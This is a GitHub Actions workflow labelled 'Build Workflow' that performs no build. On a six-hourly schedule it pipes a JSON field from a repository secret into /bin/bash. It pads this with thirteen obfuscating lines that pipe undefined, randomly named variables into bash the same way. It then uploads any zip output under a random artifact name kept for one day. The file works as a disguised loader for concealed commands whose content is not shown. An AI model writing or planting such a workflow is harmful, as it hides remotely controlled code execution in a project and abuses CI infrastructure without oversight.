name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '53 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          rik8410: ${{ secrets.rik8410 }}
        run: |
          printf '%s' "$rik8410" | jq -r .totf0031 | /bin/bash
          echo $epcvo41 | jq -r .qqqj34 | /bin/bash
          echo $jwxo0 | jq -r .zchby770 | /bin/bash
          echo $aset383 | jq -r .o4 | /bin/bash
          printf '%s' "$xmc30474" | jq -r .swxb2 | /bin/bash
          echo $hs07 | jq -r .efp147 | /bin/bash
          printf '%s' "$sx3517" | jq -r .krq93591 | /bin/bash
          echo $i57 | jq -r .hzjbr975 | /bin/bash
          printf '%s' "$rrkuq899" | jq -r .dyej958 | /bin/bash
          echo $q5 | jq -r .vo39 | /bin/bash
          printf '%s' "$pxfh9" | jq -r .zb1 | /bin/bash
          echo $bh58196 | jq -r .ocff2403 | /bin/bash
          echo $szbgg15 | jq -r .kbvz5183 | /bin/bash
          echo $iud6 | jq -r .crv2703 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jUy1tmLm
          path: "*.zip"
          retention-days: 1
